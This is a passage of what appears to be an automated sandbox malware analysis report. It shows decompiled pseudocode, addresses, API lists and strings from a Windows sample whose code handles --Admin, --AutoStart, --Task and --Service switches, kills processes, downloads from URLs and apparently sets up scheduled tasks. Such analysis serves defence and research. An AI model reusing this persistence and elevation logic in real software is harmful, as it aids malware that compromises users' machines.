                                                                                    									}
                                                                                    									E00413210( &_a204);
                                                                                    									E00413210( &_a132);
                                                                                    									E00412D50( &_a56);
                                                                                    									E00413B10( &_a44);
                                                                                    									return _t1242;
                                                                                    								} else {
                                                                                    									__eflags = 0;
                                                                                    									E00413B10( &_a116);
                                                                                    									return 0;
                                                                                    								}
                                                                                    							} else {
                                                                                    								_t1145 = _a28;
                                                                                    								_v12 = _t1145 + 0x14;
                                                                                    								_t968 = _t1145 + 0xc;
                                                                                    								_a24 = _t1145 + 0x10;
                                                                                    								while(1) {
                                                                                    									_t895 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_t1145 + _t1201 * 4)), L"--Admin");
                                                                                    									_t1264 = _t1264 + 8;
                                                                                    									__eflags = _t895;
                                                                                    									_t896 = _a28;
                                                                                    									if(_t895 != 0) {
                                                                                    										goto L17;
                                                                                    									}
                                                                                    									__eflags = lstrcmpW(L"IsAutoStart",  *(_t896 + 4 + _t1201 * 4));
                                                                                    									_t1154 =  ==  ? 1 : _a20 & 0x000000ff;
                                                                                    									_a20 =  ==  ? 1 : _a20 & 0x000000ff;
                                                                                    									__eflags = lstrcmpW(L"IsTask",  *_t968);
                                                                                    									_t1157 =  ==  ? 1 : _a32 & 0x000000ff;
                                                                                    									 *0x513235 = 1;
                                                                                    									_t1201 = _t1201 + 2;
                                                                                    									_a24 =  &(_a24[2]);
                                                                                    									_t968 =  &(_t968[2]);
                                                                                    									_a32 =  ==  ? 1 : _a32 & 0x000000ff;
                                                                                    									_t923 =  &(_v12[2]);
                                                                                    									L25:
                                                                                    									_a24 =  &(_a24[1]);
                                                                                    									_t1201 = _t1201 + 1;
                                                                                    									_t968 =  &(_t968[1]);
                                                                                    									_v12 =  &(_t923[1]);
                                                                                    									__eflags = _t1201 - _a36;
                                                                                    									if(_t1201 < _a36) {
                                                                                    										_t1145 = _a28;
                                                                                    										continue;
                                                                                    									} else {
                                                                                    										goto L26;
                                                                                    									}
                                                                                    									goto L235;
                                                                                    									L17:
                                                                                    									_t897 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_t896 + _t1201 * 4)), L"--ForNetRes");
                                                                                    									_t1264 = _t1264 + 8;
                                                                                    									__eflags = _t897;
                                                                                    									_t898 = _a28;
                                                                                    									if(_t897 != 0) {
                                                                                    										_t899 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_t898 + _t1201 * 4)), L"--Task");
                                                                                    										_t1264 = _t1264 + 8;
                                                                                    										__eflags = _t899;
                                                                                    										if(_t899 != 0) {
                                                                                    											_t901 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_a28 + _t1201 * 4)), L"--AutoStart");
                                                                                    											_t1264 = _t1264 + 8;
                                                                                    											__eflags = _t901;
                                                                                    											if(_t901 != 0) {
                                                                                    												_t903 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_a28 + _t1201 * 4)), L"--Service");
                                                                                    												_t1264 = _t1264 + 8;
                                                                                    												__eflags = _t903;
                                                                                    												if(_t903 == 0) {
                                                                                    													_t969 = _a28;
                                                                                    													_t1248 = E00423C92( *((intOrPtr*)(_t969 + 4 + _t1201 * 4)));
                                                                                    													_a40 = _t1248;
                                                                                    													lstrcpyW(0x51a7c0,  *(_t969 + 8 + _t1201 * 4));
                                                                                    													lstrcpyW(0x521cf0,  *(_t969 + 0xc + _t1201 * 4));
                                                                                    													while(1) {
                                                                                    														_t1220 = OpenProcess(0x100000, 0, _t1248);
                                                                                    														__eflags = _t1220;
                                                                                    														if(_t1220 == 0) {
                                                                                    															break;
                                                                                    														}
                                                                                    														_t916 = WaitForSingleObject(_t1220, 0x1f4);
                                                                                    														_t917 = CloseHandle(_t1220);
                                                                                    														_t916 - 0x102 = _t917 & 0xffffff00 | _t916 == 0x00000102;
                                                                                    														if((_t917 & 0xffffff00 | _t916 == 0x00000102) == 0) {
                                                                                    															break;
                                                                                    														} else {
                                                                                    															_t919 = E00411AB0();
                                                                                    															__eflags = _t919;
                                                                                    															if(_t919 != 0) {
                                                                                    																GlobalFree(_t969);
                                                                                    																__eflags = 0;
                                                                                    																E00413B10( &_a116);
                                                                                    																return 0;
                                                                                    															} else {
                                                                                    																Sleep(1);
                                                                                    																_t1248 = _a40;
                                                                                    																continue;
                                                                                    															}
                                                                                    														}
                                                                                    														goto L235;
                                                                                    													}
                                                                                    													E00411CD0(_t969, 0, 0);
                                                                                    													 *0x529224 = 0;
                                                                                    													_t1249 = GetCurrentProcess();
                                                                                    													_a40 = 0;
                                                                                    													GetExitCodeProcess(_t1249,  &_a40);
                                                                                    													TerminateProcess(_t1249, _a40);
                                                                                    													CloseHandle(_t1249);
                                                                                    													__eflags = 0;
                                                                                    													E00413B10( &_a116);
                                                                                    													return 0; // executed
                                                                                    												} else {
                                                                                    													goto L24;
                                                                                    												}
                                                                                    											} else {
                                                                                    												_a20 = 1;
                                                                                    												goto L24;
                                                                                    											}
                                                                                    										} else {
                                                                                    											_a32 = 1;
                                                                                    											L24:
                                                                                    											_t923 = _v12;
                                                                                    											goto L25;
                                                                                    										}
                                                                                    									} else {
                                                                                    										 *0x513234 = 1;
                                                                                    										lstrcpyW(0x51a7c0,  *(_t898 + 4 + _t1201 * 4));
                                                                                    										lstrcpyW(0x521cf0,  *_t968);
                                                                                    										__eflags = lstrcmpW(L"IsAutoStart",  *_a24);
                                                                                    										_t1149 =  ==  ? 1 : _a20 & 0x000000ff;
                                                                                    										_a20 =  ==  ? 1 : _a20 & 0x000000ff;
                                                                                    										__eflags = lstrcmpW(L"IsTask",  *_v12);
                                                                                    										_t1151 =  ==  ? 1 : _a32 & 0x000000ff;
                                                                                    										_a24 =  &(_a24[4]);
                                                                                    										_t1201 = _t1201 + 4;
                                                                                    										_t968 =  &(_t968[4]);
                                                                                    										_a32 =  ==  ? 1 : _a32 & 0x000000ff;
                                                                                    										_t923 =  &(_v12[4]);
                                                                                    										goto L25;
                                                                                    									}
                                                                                    									goto L235;
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    				} else {
                                                                                    					E004124E0();
                                                                                    					return 0;
                                                                                    				}
                                                                                    				L235:
                                                                                    			}
                                                                                    0x0041b6ef
                                                                                    0x0041b6f1
                                                                                    0x0041b6fa
                                                                                    0x0041b705
                                                                                    0x0041b70a
                                                                                    0x0041b70d
                                                                                    0x0041b717
                                                                                    0x0041b721
                                                                                    0x0041b721
                                                                                    0x0041b72b
                                                                                    0x0041b731
                                                                                    0x0041b733
                                                                                    0x0041b73c
                                                                                    0x0041b747
                                                                                    0x0041b74c
                                                                                    0x0041b74f
                                                                                    0x0041b759
                                                                                    0x0041b763
                                                                                    0x0041b763
                                                                                    0x0041b76d
                                                                                    0x0041b773
                                                                                    0x0041b775
                                                                                    0x0041b77e
                                                                                    0x0041b789
                                                                                    0x0041b78e
                                                                                    0x0041b791
                                                                                    0x0041b79b
                                                                                    0x0041b7a5
                                                                                    0x0041b7a5
                                                                                    0x0041b7af
                                                                                    0x0041b7b6
                                                                                    0x0041b7be
                                                                                    0x0041b7c3
                                                                                    0x0041b7c3
                                                                                    0x0041b7c8
                                                                                    0x0041b7d2
                                                                                    0x0041b7dc
                                                                                    0x0041b7e3
                                                                                    0x0041b7ea
                                                                                    0x0041b7f2
                                                                                    0x0041b7f7
                                                                                    0x0041b7f7
                                                                                    0x0041b7fc
                                                                                    0x0041b806
                                                                                    0x0041b810
                                                                                    0x0041b817
                                                                                    0x0041b81e
                                                                                    0x0041b826
                                                                                    0x0041b82b
                                                                                    0x0041b82b
                                                                                    0x0041b830
                                                                                    0x0041b83a
                                                                                    0x0041b844
                                                                                    0x0041b84b
                                                                                    0x0041b852
                                                                                    0x0041b85a
                                                                                    0x0041b85f
                                                                                    0x0041b85f
                                                                                    0x0041b864
                                                                                    0x0041b86e
                                                                                    0x0041b878
                                                                                    0x0041b87f
                                                                                    0x0041b883
                                                                                    0x0041b888
                                                                                    0x0041b88d
                                                                                    0x0041b890
                                                                                    0x0041b897
                                                                                    0x0041b899
                                                                                    0x0041b8a0
                                                                                    0x0041b8a5
                                                                                    0x0041a065
                                                                                    0x0041a06d
                                                                                    0x0041a073
                                                                                    0x0041a079
                                                                                    0x0041a07b
                                                                                    0x0041a08f
                                                                                    0x0041a099
                                                                                    0x0041a09d
                                                                                    0x0041a09f
                                                                                    0x0041a0a3
                                                                                    0x0041a0a7
                                                                                    0x0041a0ac
                                                                                    0x0041a0bb
                                                                                    0x0041a0c2
                                                                                    0x0041a0c8
                                                                                    0x0041a0ce
                                                                                    0x0041a0e7
                                                                                    0x0041a0f3
                                                                                    0x0041a0fb
                                                                                    0x0041a100
                                                                                    0x0041a10a
                                                                                    0x0041a10c
                                                                                    0x0041a10e
                                                                                    0x0041a112
                                                                                    0x0041a116
                                                                                    0x0041a11b
                                                                                    0x0041a11b
                                                                                    0x0041a11e
                                                                                    0x0041a120
                                                                                    0x0041a127
                                                                                    0x0041a130
                                                                                    0x0041a13b
                                                                                    0x0041a13b
                                                                                    0x0041a140
                                                                                    0x0041a148
                                                                                    0x0041a151
                                                                                    0x0041a156
                                                                                    0x0041a156
                                                                                    0x0041a159
                                                                                    0x0041a16d
                                                                                    0x0041a173
                                                                                    0x0041a181
                                                                                    0x0041a187
                                                                                    0x0041a18c
                                                                                    0x0041a190
                                                                                    0x0041a33d
                                                                                    0x0041a341
                                                                                    0x0041a347
                                                                                    0x0041a34e
                                                                                    0x0041a45c
                                                                                    0x0041a461
                                                                                    0x0041a354
                                                                                    0x0041a359
                                                                                    0x0041a359
                                                                                    0x0041a464
                                                                                    0x0041a48a
                                                                                    0x0041a48f
                                                                                    0x0041a493
                                                                                    0x0041a496
                                                                                    0x0041a4a1
                                                                                    0x0041a4a1
                                                                                    0x0041a4a3
                                                                                    0x0041a4ae
                                                                                    0x0041a4b6
                                                                                    0x0041a4b6
                                                                                    0x0041a4b9
                                                                                    0x0041a4bc
                                                                                    0x0041a4c2
                                                                                    0x0041a4c7
                                                                                    0x0041a4d0
                                                                                    0x0041a4d0
                                                                                    0x0041a4d2
                                                                                    0x0041a4d3
                                                                                    0x0041a4d3
                                                                                    0x0041a4d7
                                                                                    0x0041a4d7
                                                                                    0x0041a4be
                                                                                    0x0041a4be
                                                                                    0x0041a4be
                                                                                    0x0041a4db
                                                                                    0x0041a4e4
                                                                                    0x0041a4e9
                                                                                    0x0041a4ea
                                                                                    0x0041a4ea
                                                                                    0x0041a4ef
                                                                                    0x0041a4fe
                                                                                    0x0041a506
                                                                                    0x0041a50c
                                                                                    0x0041a51b
                                                                                    0x0041a529
                                                                                    0x0041a531
                                                                                    0x0041a538
                                                                                    0x0041a547
                                                                                    0x0041a553
                                                                                    0x0041a55e
                                                                                    0x0041a563
                                                                                    0x0041a567
                                                                                    0x0041a56a
                                                                                    0x0041a56e
                                                                                    0x0041a570
                                                                                    0x0041a6ea
                                                                                    0x0041a6ea
                                                                                    0x0041a576
                                                                                    0x0041a576
                                                                                    0x0041a578
                                                                                    0x00000000
                                                                                    0x0041a57e
                                                                                    0x0041a580
                                                                                    0x0041a588
                                                                                    0x0041a58b
                                                                                    0x0041a59b
                                                                                    0x0041a5a4
                                                                                    0x0041a5af
                                                                                    0x0041a5b2
                                                                                    0x0041a5b6
                                                                                    0x0041a5b8
                                                                                    0x0041a5bf
                                                                                    0x0041a5c7
                                                                                    0x0041a5cf
                                                                                    0x0041a5d6
                                                                                    0x0041a5db
                                                                                    0x0041a5de
                                                                                    0x0041a5e3
                                                                                    0x0041a5e9
                                                                                    0x0041a5ee
                                                                                    0x0041a5ee
                                                                                    0x0041a5f1
                                                                                    0x0041a5f1
                                                                                    0x0041a578
                                                                                    0x0041a5f5
                                                                                    0x0041a602
                                                                                    0x0041a6f9
                                                                                    0x0041a6f9
                                                                                    0x00000000
                                                                                    0x0041a608
                                                                                    0x0041a608
                                                                                    0x0041a60a
                                                                                    0x0041a702
                                                                                    0x0041a702
                                                                                    0x0041a709
                                                                                    0x00000000
                                                                                    0x0041a70f
                                                                                    0x0041a70f
                                                                                    0x0041a711
                                                                                    0x0041a717
                                                                                    0x0041a719
                                                                                    0x0041a72a
                                                                                    0x0041a72f
                                                                                    0x0041a733
                                                                                    0x0041a736
                                                                                    0x0041a741
                                                                                    0x0041a741
                                                                                    0x0041a743
                                                                                    0x0041a74e
                                                                                    0x0041a752
                                                                                    0x0041a752
                                                                                    0x0041a755
                                                                                    0x0041a758
                                                                                    0x0041a75e
                                                                                    0x0041a760
                                                                                    0x0041a763
                                                                                    0x0041a763
                                                                                    0x0041a765
                                                                                    0x0041a766
                                                                                    0x0041a766
                                                                                    0x0041a76a
                                                                                    0x0041a76a
                                                                                    0x0041a75a
                                                                                    0x0041a75a
                                                                                    0x0041a75a
                                                                                    0x0041a76c
                                                                                    0x0041a775
                                                                                    0x0041a77a
                                                                                    0x0041a77b
                                                                                    0x0041a77b
                                                                                    0x0041a784
                                                                                    0x0041a788
                                                                                    0x0041a78e
                                                                                    0x0041a790
                                                                                    0x0041a792
                                                                                    0x0041a797
                                                                                    0x0041a797
                                                                                    0x0041a7bb
                                                                                    0x0041a7c1
                                                                                    0x0041a7c9
                                                                                    0x0041a7ce
                                                                                    0x0041a7d4
                                                                                    0x0041a7d9
                                                                                    0x0041a7d9
                                                                                    0x0041a7ce
                                                                                    0x0041a719
                                                                                    0x0041a7e7
                                                                                    0x0041a7ec
                                                                                    0x0041a7ef
                                                                                    0x0041a7ef
                                                                                    0x0041a7f1
                                                                                    0x0041a7f1
                                                                                    0x0041a7f9
                                                                                    0x0041a803
                                                                                    0x0041a813
                                                                                    0x0041a819
                                                                                    0x0041a81e
                                                                                    0x0041a82f
                                                                                    0x0041a83b
                                                                                    0x0041a841
                                                                                    0x0041a842
                                                                                    0x0041a842
                                                                                    0x0041a852
                                                                                    0x0041a854
                                                                                    0x0041a85b
                                                                                    0x0041a87a
                                                                                    0x0041a886
                                                                                    0x0041a88c
                                                                                    0x0041a895
                                                                                    0x0041a89a
                                                                                    0x0041a89a
                                                                                    0x0041a8af
                                                                                    0x0041a8af
                                                                                    0x00000000
                                                                                    0x0041a610
                                                                                    0x0041a610
                                                                                    0x0041a612
                                                                                    0x00000000
                                                                                    0x0041aecd
                                                                                    0x0041aed3
                                                                                    0x0041aed8
                                                                                    0x0041aed8
                                                                                    0x0041aedb
                                                                                    0x0041aedf
                                                                                    0x0041aef0
                                                                                    0x0041aef8
                                                                                    0x0041aefd
                                                                                    0x0041af09
                                                                                    0x0041af0e
                                                                                    0x0041af13
                                                                                    0x0041af19
                                                                                    0x0041af1e
                                                                                    0x0041af1e
                                                                                    0x0041af21
                                                                                    0x0041af25
                                                                                    0x0041af36
                                                                                    0x0041af3e
                                                                                    0x0041af43
                                                                                    0x0041af4f
                                                                                    0x0041af54
                                                                                    0x0041af59
                                                                                    0x0041af5f
                                                                                    0x0041af64
                                                                                    0x0041af64
                                                                                    0x0041af67
                                                                                    0x0041af6b
                                                                                    0x0041af7c
                                                                                    0x0041af84
                                                                                    0x0041af89
                                                                                    0x0041af95
                                                                                    0x0041af9a
                                                                                    0x0041af9f
                                                                                    0x0041afa5
                                                                                    0x0041afaa
                                                                                    0x0041afaa
                                                                                    0x0041afad
                                                                                    0x0041afb1
                                                                                    0x0041afc2
                                                                                    0x0041afca
                                                                                    0x0041afcf
                                                                                    0x0041afdb
                                                                                    0x0041afe0
                                                                                    0x0041afe5
                                                                                    0x0041afeb
                                                                                    0x0041aff0
                                                                                    0x0041aff0
                                                                                    0x0041affc
                                                                                    0x0041b00e
                                                                                    0x0041b01a
                                                                                    0x0041b020
                                                                                    0x0041b029
                                                                                    0x0041b037
                                                                                    0x0041b045
                                                                                    0x0041b04c
                                                                                    0x0041b04c
                                                                                    0x0041b054
                                                                                    0x0041b05d
                                                                                    0x0041b06b
                                                                                    0x0041b077
                                                                                    0x0041b080
                                                                                    0x0041b08e
                                                                                    0x0041b09a
                                                                                    0x0041b0a3
                                                                                    0x0041b0b1
                                                                                    0x0041b0bd
                                                                                    0x0041b0c6
                                                                                    0x0041b0d4
                                                                                    0x0041b0e0
                                                                                    0x0041b0e9
                                                                                    0x0041b0f7
                                                                                    0x0041b103
                                                                                    0x0041b10c
                                                                                    0x0041b111
                                                                                    0x0041b111
                                                                                    0x0041b11b
                                                                                    0x0041b120
                                                                                    0x0041b124
                                                                                    0x0041b12b
                                                                                    0x0041b130
                                                                                    0x0041b136
                                                                                    0x0041b13f
                                                                                    0x0041b13f
                                                                                    0x0041b150
                                                                                    0x0041b159
                                                                                    0x0041b169
                                                                                    0x0041b16e
                                                                                    0x0041b178
                                                                                    0x0041b17d
                                                                                    0x0041b181
                                                                                    0x0041b190
                                                                                    0x0041b19a
                                                                                    0x0041b19f
                                                                                    0x0041b1a0
                                                                                    0x0041b1a0
                                                                                    0x0041b1a9
                                                                                    0x0041b1ba
                                                                                    0x0041b1c4
                                                                                    0x0041b1c9
                                                                                    0x0041b1d3
                                                                                    0x0041b1d8
                                                                                    0x0041b1e5
                                                                                    0x0041b1ee
                                                                                    0x0041b1f3
                                                                                    0x0041b20a
                                                                                    0x0041b21d
                                                                                    0x0041b222
                                                                                    0x0041b224
                                                                                    0x0041b230
                                                                                    0x0041b23b
                                                                                    0x0041b240
                                                                                    0x0041b246
                                                                                    0x0041b251
                                                                                    0x0041b259
                                                                                    0x0041b260
                                                                                    0x0041b269
                                                                                    0x0041b27d
                                                                                    0x0041b28c
                                                                                    0x0041b291
                                                                                    0x0041b297
                                                                                    0x0041b299
                                                                                    0x0041b29f
                                                                                    0x0041b2af
                                                                                    0x0041b2b4
                                                                                    0x0041b2bb
                                                                                    0x0041b2c7
                                                                                    0x0041b2d0
                                                                                    0x0041b2e8
                                                                                    0x0041b2ed
                                                                                    0x0041b2ed
                                                                                    0x0041b230
                                                                                    0x0041b2fd
                                                                                    0x0041b303
                                                                                    0x0041b30c
                                                                                    0x0041b314
                                                                                    0x0041b31d
                                                                                    0x0041b322
                                                                                    0x0041b336
                                                                                    0x0041b33e
                                                                                    0x0041b346
                                                                                    0x0041b34b
                                                                                    0x0041b34d
                                                                                    0x0041b35f
                                                                                    0x0041b369
                                                                                    0x0041b36b
                                                                                    0x0041b374
                                                                                    0x0041b389
                                                                                    0x0041b392
                                                                                    0x0041b3a0
                                                                                    0x0041b3ae
                                                                                    0x0041b3b7
                                                                                    0x0041b3c5
                                                                                    0x0041b3dd
                                                                                    0x0041b3e2
                                                                                    0x0041b3e4
                                                                                    0x0041b3ea
                                                                                    0x0041b3f0
                                                                                    0x0041b3fa
                                                                                    0x0041b40c
                                                                                    0x0041b418
                                                                                    0x0041b41d
                                                                                    0x0041b422
                                                                                    0x0041b428
                                                                                    0x0041b42d
                                                                                    0x0041b43d
                                                                                    0x0041b443
                                                                                    0x0041b449
                                                                                    0x0041b44f
                                                                                    0x0041b45d
                                                                                    0x0041b466
                                                                                    0x0041b47e
                                                                                    0x0041b483
                                                                                    0x0041b483
                                                                                    0x0041b3f0
                                                                                    0x0041b495
                                                                                    0x0041b49a
                                                                                    0x0041b4b3
                                                                                    0x0041b4bb
                                                                                    0x0041b4bd
                                                                                    0x0041b4c5
                                                                                    0x0041b4cd
                                                                                    0x0041b4d7
                                                                                    0x0041b4e7
                                                                                    0x0041b4e9
                                                                                    0x0041b4e9
                                                                                    0x0041b4c5
                                                                                    0x0041b4ed
                                                                                    0x0041b4fe
                                                                                    0x0041b500
                                                                                    0x0041b509
                                                                                    0x0041b510
                                                                                    0x0041b520
                                                                                    0x0041b522
                                                                                    0x0041b524
                                                                                    0x0041b526
                                                                                    0x0041b52e
                                                                                    0x0041b540
                                                                                    0x0041b542
                                                                                    0x0041b542
                                                                                    0x0041b526
                                                                                    0x0041b54e
                                                                                    0x0041b554
                                                                                    0x0041b554
                                                                                    0x0041b510
                                                                                    0x0041b55b
                                                                                    0x0041b560
                                                                                    0x0041b562
                                                                                    0x0041b56b
                                                                                    0x0041b570
                                                                                    0x0041b580
                                                                                    0x0041b582
                                                                                    0x0041b584
                                                                                    0x0041b586
                                                                                    0x0041b58e
                                                                                    0x0041b5a0
                                                                                    0x0041b5a2
                                                                                    0x0041b5a2
                                                                                    0x0041b586
                                                                                    0x0041b5ae
                                                                                    0x0041b5b4
                                                                                    0x0041b5b4
                                                                                    0x0041b570
                                                                                    0x0041b5bb
                                                                                    0x0041b5c2
                                                                                    0x0041b5c7
                                                                                    0x0041b5c9
                                                                                    0x0041b5c9
                                                                                    0x0041b5ce
                                                                                    0x0041b5d0
                                                                                    0x0041b5d3
                                                                                    0x0041b5d3
                                                                                    0x0041b5d9
                                                                                    0x0041b5e4
                                                                                    0x0041b34f
                                                                                    0x0041b34f
                                                                                    0x0041b34f
                                                                                    0x0041b5ed
                                                                                    0x0041b5f9
                                                                                    0x0041b605
                                                                                    0x0041b611
                                                                                    0x0041b61d
                                                                                    0x0041a9d1
                                                                                    0x0041a9d1
                                                                                    0x0041a9d1
                                                                                    0x0041b629
                                                                                    0x0041a624
                                                                                    0x0041a624
                                                                                    0x0041a62a
                                                                                    0x0041a62c
                                                                                    0x00000000
                                                                                    0x0041a632
                                                                                    0x0041a63f
                                                                                    0x0041a652
                                                                                    0x0041a661
                                                                                    0x0041a66f
                                                                                    0x0041a67b
                                                                                    0x0041a686
                                                                                    0x0041a68d
                                                                                    0x0041a697
                                                                                    0x0041a6a2
                                                                                    0x0041a6a9
                                                                                    0x0041a6ac
                                                                                    0x0041a6b0
                                                                                    0x0041a6b2
                                                                                    0x0041a6b2
                                                                                    0x0041a6b4
                                                                                    0x0041a6c3
                                                                                    0x0041a6ce
                                                                                    0x0041a6d9
                                                                                    0x0041a6df
                                                                                    0x0041a6e1
                                                                                    0x0041a6fe
                                                                                    0x0041a6fe
                                                                                    0x00000000
                                                                                    0x0041a6e3
                                                                                    0x0041a6e3
                                                                                    0x0041a6e3
                                                                                    0x0041a6e1
                                                                                    0x0041a62c
                                                                                    0x0041a61e
                                                                                    0x0041a612
                                                                                    0x0041a60a
                                                                                    0x0041b635
                                                                                    0x0041b641
                                                                                    0x0041b64d
                                                                                    0x0041b659
                                                                                    0x0041b666
                                                                                    0x0041a466
                                                                                    0x0041a46d
                                                                                    0x0041a46f
                                                                                    0x0041a47c
                                                                                    0x0041a47c

                                                                                    APIs
                                                                                      • Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
                                                                                      • Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                      • Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                    • GetCurrentProcess.KERNEL32 ref: 00419FC4
                                                                                    • GetLastError.KERNEL32 ref: 00419FD2
                                                                                    • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
                                                                                    • GetLastError.KERNEL32 ref: 00419FE4
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,006DCCE8,?), ref: 0041A0BB
                                                                                    • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
                                                                                    • GetCommandLineW.KERNEL32(?,?), ref: 0041A161
                                                                                      • Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                      • Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
                                                                                      • Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                    • String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
                                                                                    • API String ID: 2957410896-3144399390
                                                                                    • Opcode ID: 70b5b444aff160c4cda5a454501ebc16ad9a12550ae1cd8a62e69df6837b0e47
                                                                                    • Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
                                                                                    • Opcode Fuzzy Hash: 70b5b444aff160c4cda5a454501ebc16ad9a12550ae1cd8a62e69df6837b0e47
                                                                                    • Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 688 40d240-40d274 CoInitialize 689 40d276-40d278 688->689 690 40d27d-40d2dd CoInitializeSecurity call 414690 CoCreateInstance 688->690 691 40da8e-40da92 689->691 697 40d2e3-40d3ca VariantInit * 4 VariantClear * 4 690->697 698 40da3c-40da44 CoUninitialize 690->698 693 40da94-40da9c call 422587 691->693 694 40da9f-40dab1 691->694 693->694 704 40d3e2-40d3fe call 40b140 697->704 705 40d3cc-40d3dd CoUninitialize 697->705 700 40da69-40da6d 698->700 702 40da7a-40da8a 700->702 703 40da6f-40da77 call 422587 700->703 702->691 703->702 711 40d400-40d402 704->711 712 40d404 704->712 705->700 713 40d406-40d424 call 40b1d0 711->713 712->713 717 40d426-40d437 CoUninitialize 713->717 718 40d43c-40d451 call 40b140 713->718 717->700 722 40d453-40d455 718->722 723 40d457 718->723 724 40d459-40d494 call 40b1d0 722->724 723->724 730 40d496-40d4a7 CoUninitialize 724->730 731 40d4ac-40d4c2 724->731 730->700 734 40d4c8-40d4dd call 40b140 731->734 735 40da2a-40da37 731->735 739 40d4e3 734->739 740 40d4df-40d4e1 734->740 735->698 741 40d4e5-40d508 call 40b1d0 739->741 740->741 741->735 746 40d50e-40d524 741->746 746->735 748 40d52a-40d542 746->748 748->735 751 40d548-40d55e 748->751 751->735 753 40d564-40d57c 751->753 753->735 756 40d582-40d59b 753->756 756->735 758 40d5a1-40d5b6 call 40b140 756->758 761 40d5b8-40d5ba 758->761 762 40d5bc 758->762 763 40d5be-40d5e1 call 40b1d0 761->763 762->763 763->735 768 40d5e7-40d5fd 763->768 768->735 770 40d603-40d626 768->770 770->735 773 40d62c-40d651 770->773 773->735 776 40d657-40d666 773->776 776->735 778 40d66c-40d681 call 40b140 776->778 781 40d683-40d685 778->781 782 40d687 778->782 783 40d689-40d6a3 call 40b1d0 781->783 782->783 783->735 787 40d6a9-40d6be call 40b140 783->787 790 40d6c0-40d6c2 787->790 791 40d6c4 787->791 792 40d6c6-40d6e0 call 40b1d0 790->792 791->792 792->735 796 40d6e6-40d6f4 792->796 796->735 798 40d6fa-40d70f call 40b140 
796->798 801 40d711-40d713 798->801 802 40d715 798->802 803 40d717-40d731 call 40b1d0 801->803 802->803 803->735 807 40d737-40d74c call 40b140 803->807 810 40d752 807->810 811 40d74e-40d750 807->811 812 40d754-40d76e call 40b1d0 810->812 811->812 812->735 816 40d774-40d7ce call 423aaf call 423551 call 4228e0 call 412c40 call 412900 812->816 827 40d7d0 816->827 828 40d7d2-40d7e3 call 40b140 816->828 827->828 831 40d7e5-40d7e7 828->831 832 40d7e9 828->832 833 40d7eb-40d819 call 40b1d0 call 413210 831->833 832->833 833->735 840 40d81f-40d835 833->840 840->735 842 40d83b-40d85e 840->842 842->735 845 40d864-40d889 842->845 845->735 848 40d88f-40d8ab call 40b140 845->848 851 40d8b1 848->851 852 40d8ad-40d8af 848->852 853 40d8b3-40d8cd call 40b1d0 851->853 852->853 857 40d8dd-40d8f2 call 40b140 853->857 858 40d8cf-40d8d8 853->858 862 40d8f4-40d8f6 857->862 863 40d8f8 857->863 858->735 864 40d8fa-40d91d call 40b1d0 862->864 863->864 864->735 869 40d923-40d98d call 40b400 VariantInit * 2 call 40b140 864->869 874 40d993 869->874 875 40d98f-40d991 869->875 876 40d995-40da0e call 40b1d0 VariantClear * 3 874->876 875->876 880 40da10-40da27 call 42052a 876->880 881 40da46-40da67 CoUninitialize 876->881 880->735 881->700
                                                                                    C-Code - Quality: 58%
                                                                                    			E0040D240(void* __ecx, char _a4, intOrPtr _a24) {
                                                                                    				char _v8;
                                                                                    				intOrPtr _v16;
                                                                                    				void* _v20;
                                                                                    				void* _v24;
                                                                                    				char _v28;
                                                                                    				void* _v32;
                                                                                    				char _v33;
                                                                                    				void* _v40;
                                                                                    				void* _v44;
                                                                                    				void* _v48;
